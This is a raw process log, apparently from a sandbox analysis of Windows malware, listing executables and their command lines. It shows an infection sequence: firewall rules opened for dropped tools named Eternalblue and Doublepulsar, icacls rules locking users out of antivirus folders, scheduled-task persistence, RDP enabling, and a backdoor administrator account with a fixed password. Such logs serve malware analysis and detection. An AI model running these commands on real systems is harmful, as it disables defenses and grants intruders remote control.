C:\ProgramData\Windows\rutserv.exe

C:\ProgramData\Windows\rutserv.exe

C:\Windows\SysWOW64\sc.exe

sc stop clr_optimization_v4.0.30318_64

C:\Windows\SysWOW64\sc.exe

sc delete clr_optimization_v4.0.30318_64"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc stop MicrosoftMysql

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete MicrosoftMysql

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN

C:\Windows\SysWOW64\sc.exe

sc stop MicrosoftMysql

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes

C:\Windows\SysWOW64\sc.exe

sc delete MicrosoftMysql

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall set allprofiles state on

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes

C:\Windows\SysWOW64\attrib.exe

ATTRIB +H +S C:\Programdata\Windows\*.*

C:\ProgramData\Windows\rfusclient.exe

C:\ProgramData\Windows\rfusclient.exe

C:\ProgramData\Windows\rfusclient.exe

C:\ProgramData\Windows\rfusclient.exe /tray

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes

C:\programdata\microsoft\intel\R8.exe

C:\programdata\microsoft\intel\R8.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out

C:\Windows\SysWOW64\attrib.exe

ATTRIB +H +S C:\Programdata\Windows

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\rdp\pause.bat" "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Microsoft JDX" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\timeout.exe

timeout 5

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im Rar.exe

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Windows\svchost.exe" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Windows\Fonts\Mysql" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\sc.exe

sc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/1000

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny %username%:(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny %username%:(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)

C:\Windows\SysWOW64\icacls.exe

icacls c:\programdata\Malwarebytes /deny System:(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Windows\speechstracing /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Zaxar" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "c:\program files\Internet Explorer\bin" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls c:\programdata\Malwarebytes /deny Admin:(F)

C:\Windows\SysWOW64\icacls.exe

icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im Rar.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\MB3Install /deny Admin:(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\sc.exe

sc config RManService obj= LocalSystem type= interact type= own

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\MB3Install /deny System:(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\Indus /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Programdata\Driver Foundation Visions VHG" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\timeout.exe

timeout 3

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\sc.exe

sc config RManService DisplayName= "Microsoft Framework"

C:\ProgramData\Microsoft\Intel\winlog.exe

C:\ProgramData\Microsoft\Intel\winlog.exe -p123

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\icacls.exe

icacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)

C:\ProgramData\Microsoft\Intel\winlogon.exe

"C:\ProgramData\Microsoft\Intel\winlogon.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\ByteFence" /deny Admin:(OI)(CI)(F)

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\4769.tmp\476A.bat C:\ProgramData\Microsoft\Intel\winlogon.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

PowerShell.exe -command "Import-Module applocker" ; "Set-AppLockerPolicy -XMLPolicy C:\ProgramData\microsoft\Temp\5.xml"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\KVRT_Data /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)

C:\ProgramData\Windows\rfusclient.exe

C:\ProgramData\Windows\rfusclient.exe /tray

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\chcp.com

chcp 1251

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny %username%:(OI)(CI)(F)

C:\Programdata\RealtekHD\taskhostw.exe

C:\Programdata\RealtekHD\taskhostw.exe

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\COMODO" /deny Admin:(OI)(CI)(F)

C:\rdp\Rar.exe

"Rar.exe" e -p555 db.rar

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny %username%:(OI)(CI)(F)

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Enigma Software Group" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im Rar.exe

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\AVAST Software" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\timeout.exe

timeout 2

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\AVAST Software" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\H.bat

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)

C:\Programdata\WindowsTask\winlogon.exe

C:\Programdata\WindowsTask\winlogon.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /C schtasks /query /fo list

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\schtasks.exe

schtasks /query /fo list

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"

C:\Windows\SysWOW64\timeout.exe

timeout 2

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\rdp\bat.bat" "

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\netsh.exe

netsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Kaspersky Lab" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\net.exe

net.exe user "john" "12345" /add

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 user "john" "12345" /add

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\chcp.com

chcp 1251

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\net.exe

net localgroup "Администраторы" "John" /add

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup "Администраторы" "John" /add

C:\Windows\SysWOW64\net.exe

net localgroup "Administratorzy" "John" /add

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup "Administratorzy" "John" /add

C:\Windows\SysWOW64\net.exe

net localgroup "Administrators" John /add

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup "Administrators" John /add

C:\Windows\SysWOW64\net.exe

net localgroup "Administradores" John /add

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup "Administradores" John /add

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\Doctor Web" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\net.exe

net localgroup "Пользователи удаленного рабочего стола" John /add

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add

C:\Windows\SysWOW64\net.exe

net localgroup "Пользователи удаленного управления" John /add

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add

C:\Windows\SysWOW64\net.exe

net localgroup "Remote Desktop Users" John /add

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\net.exe

net localgroup "Usuarios de escritorio remoto" John /add

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" John /add

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\grizzly" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\net.exe

net localgroup "Uzytkownicy pulpitu zdalnego" John /add

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" John /add

C:\rdp\RDPWInst.exe

"RDPWInst.exe" -i -o

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\Temp.bat

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Cezurity" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\timeout.exe

TIMEOUT /T 5 /NOBREAK

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Cezurity" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\McAfee" /deny Admin:(OI)(CI)(F)

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -s TermService

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Common Files\McAfee" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

